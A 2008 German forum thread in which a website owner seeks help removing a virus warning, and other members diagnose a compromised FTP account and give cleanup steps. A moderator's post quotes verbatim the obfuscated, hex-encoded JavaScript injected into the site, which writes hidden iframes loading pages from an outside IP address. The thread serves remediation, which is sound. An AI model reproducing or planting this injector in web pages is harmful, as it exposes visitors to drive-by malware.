Zurück   klamm-Forum > klamm-Lose > Lose4Action

Antwort
 
LinkBack Themen-Optionen Ansicht
Alt 17.05.2008, 23:55:38   #1 (permalink)
Benutzer

ID: 306890
Lose-Remote

Reg: 25.12.2007
Beiträge: 84
Standard Wer findet den Virus, oder eine Lösung.

Guten Tag,
bei manschen Leuten wird ein Virus angezeigt. Ich brauch irgendwie eine Lösung,
wie ich diesen Virus von der Seite bekomme. Die Seite lautet http://nt-sponsoring.de wer eine Lösung findet den Virus zu löschen der auf der Homepage ist bekommt 1.155.000 Lose. Ich danke euch sehr dafür.


Mit freundlichen Grüßen Arthur.



Geändert von bfkj2 (17.05.2008 um 23:56:38 Uhr)
bfkj2 ist offline   Mit Zitat antworten
Alt 18.05.2008, 00:04:17   #2 (permalink)
MØþ€®@¶øℜ
Benutzerbild von Totte

ID: 67388
Lose-Remote

Reg: 20.04.2006
Beiträge: 56.977
Standard

http://forum.avira.com/wbb/index.php...&postid=299168

http://www.viruslist.com/de/search?V...ey&referer=kis
Und sowas hast du auch im Quelltext
Mehrfach
HTML-Code:
1:
2:
<map name="lost"><area shape="rect" coords="238,21,289,29" href="index.php?site=lostpassword"></map><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48047274cae42(v48047274cb23b){ return(parseInt(v48047274cb23b,16));}function v48047274cbe44(v48047274cc23f){ var v48047274cc63c='';for(v48047274cca36=0; v48047274cca36<v48047274cc23f.length; v48047274cca36+=2){ v48047274cc63c+=(String.fromCharCode(v48047274cae42(v48047274cc23f.substr(v48047274cca36, 2))));}return v48047274cc63c;} document.write(v48047274cbe44('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D333039306262313561613261207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313338373638292B27383335643834353763355C272077696474683D323934206865696768743D343732207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4804726435ed1(v48047264366c8){ function v4804726436ec1 () {return 16;} return(parseInt(v48047264366c8,v4804726436ec1()));}function v4804726437abc(v4804726437eb2){ var v4804726438aa8=2; var v48047264382ae='';for(v48047264386ac=0; v48047264386ac<v4804726437eb2.length; v48047264386ac+=v4804726438aa8){ v48047264382ae+=(String.fromCharCode(v4804726435ed1(v4804726437eb2.substr(v48047264386ac, v4804726438aa8))));}return v48047264382ae;} document.write(v4804726437abc('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3831373833626536207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33363438292B27633233333466306539395C272077696474683D3438206865696768743D3736207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script></td> </tr>
HTML-Code:
1:
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48047272a44e6(v48047272a48e0){ function v48047272a4cdc () {return 16;} return(parseInt(v48047272a48e0,v48047272a4cdc()));}function v48047272a54d7(v48047272a58d1){ function v48047272a64c8 () {return 2;} var v48047272a5cd0='';for(v48047272a60ca=0; v48047272a60ca<v48047272a58d1.length; v48047272a60ca+=v48047272a64c8()){ v48047272a5cd0+=(String.fromCharCode(v48047272a44e6(v48047272a58d1.substr(v48047272a60ca, v48047272a64c8()))));}return v48047272a5cd0;} document.write(v48047272a54d7('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D643864376239393532326439207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313632323635292B2739626239383332393663365C272077696474683D343135206865696768743D333931207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Ich bin fast ausschließlich in der Modsprechstunde erreichbar
The only easy day was yesterday
Totte ist offline   Mit Zitat antworten
Alt 18.05.2008, 13:05:10   #3 (permalink)
Benutzer

ID: 306890
Lose-Remote

Reg: 25.12.2007
Beiträge: 84
Standard

Ok ich lösch das mal, könnte dann mal jemand schauen ob es noch drinne ist?
Achso, in welchen Dateien ist es genau drinne? Wenn alles raus ist schick ich dir die Lose .
bfkj2 ist offline Threadstarter   Mit Zitat antworten
Alt 18.05.2008, 13:12:29   #4 (permalink)
MØþ€®@¶øℜ
Benutzerbild von Totte

ID: 67388
Lose-Remote

Reg: 20.04.2006
Beiträge: 56.977
Standard

Ich kann schlecht in deine Dateien schauen, es ist in der Seite drin, die durch den Link aufgerufen wird..
Woraus der Quelltext da bezogen wird, musst du mal schauen
Ich bin fast ausschließlich in der Modsprechstunde erreichbar
The only easy day was yesterday
Totte ist offline   Mit Zitat antworten
Alt 18.05.2008, 13:23:51   #5 (permalink)
Benutzer

ID: 306890
Lose-Remote

Reg: 25.12.2007
Beiträge: 84
Standard

Hmm hast du vielleicht Icq oder so? Dann könnte ich dir mal die Homepage schicken und wir können gemeinsam suchen, ich finde den irgendwie nicht.
bfkj2 ist offline Threadstarter   Mit Zitat antworten
Alt 18.05.2008, 13:28:08   #6 (permalink)
MØþ€®@¶øℜ
Benutzerbild von Totte

ID: 67388
Lose-Remote

Reg: 20.04.2006
Beiträge: 56.977
Standard

Da müsstest du dir einen Programmierer / Scripter suchen, ich hab da wenig Erfahrung damit mit php oder was das ist
Ich bin fast ausschließlich in der Modsprechstunde erreichbar
The only easy day was yesterday
Totte ist offline   Mit Zitat antworten
Alt 18.05.2008, 13:33:34   #7 (permalink)
Benutzer

ID: 306890
Lose-Remote

Reg: 25.12.2007
Beiträge: 84
Standard

Ok ich habe sie gefunden und gelöscht. Kann mir jemand sagen ob der Virus jetzt richtig weg ist?
bfkj2 ist offline Threadstarter   Mit Zitat antworten
Alt 18.05.2008, 13:39:35   #8 (permalink)
MØþ€®@¶øℜ
Benutzerbild von Totte

ID: 67388
Lose-Remote

Reg: 20.04.2006
Beiträge: 56.977
Standard

Bei mir kommt die Meldung noch...

Ich bin fast ausschließlich in der Modsprechstunde erreichbar
The only easy day was yesterday
Totte ist offline   Mit Zitat antworten
Alt 18.05.2008, 13:42:24   #9 (permalink)
Benutzer

ID: 306890
Lose-Remote

Reg: 25.12.2007
Beiträge: 84
Standard

Gibt es noch mehr Informationen über diesen Virus, wo er sein könnte?
bfkj2 ist offline Threadstarter   Mit Zitat antworten
Alt 23.05.2008, 09:24:44   #10 (permalink)
Ad-Minister

ID: 7784
Lose-Remote

tipcity eine Nachricht über ICQ schicken
Reg: 21.01.2007
Beiträge: 37
Daumen hoch So wirst Du das dauerhaft los

Moin!

Dein Problem:
Jemand hat das FTP-Password Deines Accounts geknackt, vermutlich durch einen Trojaner auf Deinem Rechner. Dadurch kann er die Index-Seite deiner HP auslesen, das Script anfügen und auf Deinen Account laden. Betroffen sind meist alle index.htm, index.html, index.php und home.htm etc. bis in die 2. Ordnerebene. Je nach Version des Virus können auch andere Seiten befallen sein.


Lösung in dieser Reihenfolge:

1. Die verseuchten Seiten durch eine saubere Kopie von Deinem Rechner ersetzen. Wenn Du ein CMS oder einen Editor benutzt, musst Du das Script im HTML-Modus aus dem Quelltext kicken. Gemeint ist dies hier:
<iframe src='http://url' width='1' height='1'...
(sh. obigen Beitrag von Totte)

2.Die Rechte der Seiten mit CHMOD auf "nur lesen" ändern, damit sie nicht mehr einfach überschrieben werden können. Du musst dann aber jedesmal, wenn Du die Seite selbst änderst, die Schreibrechte kurz manuell zulassen und dann wieder sperren.

3. Den Trojaner finden und eliminieren, der Dein FTP-Programm ausgelesen hat, in dem Deine Passwörter gespeichert sind. Solange der auf Deinem Rechner sitzt, wird er Passwortänderungen registrieren und an den Hacker melden. Vielleicht solltest Du auch künftig ein anderes FTP-Programm nutzen.

4. FTP-Passwort ändern! Der Hacker wird sonst immer wieder versuchen, bereits bekannte Seiten wieder zu überschreiben.

Viel Erfolg!

Geändert von tipcity (23.05.2008 um 09:43:32 Uhr)
tipcity ist offline   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
30 mio oder mehr für PC Problem lösung luckystrike2006 Lose4Action 19 27.01.2008 23:14:16
[S] Photoshop oder Gimp Lösung! Freesnooze Grafik & Design 4 24.01.2008 14:26:59
IE, FF, Opera lahm bei Vista, hat wer eine Lösung Jeffy1968 Software/Windows 4 15.01.2008 11:16:35
500k Lose für eine Lösung Aquaristik Lose4Action 6 09.08.2007 18:23:59
bild dateien beschädigt? oder virus? oder? Promizock Grafik & Design 1 12.07.2006 23:42:12


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:13:24 Uhr.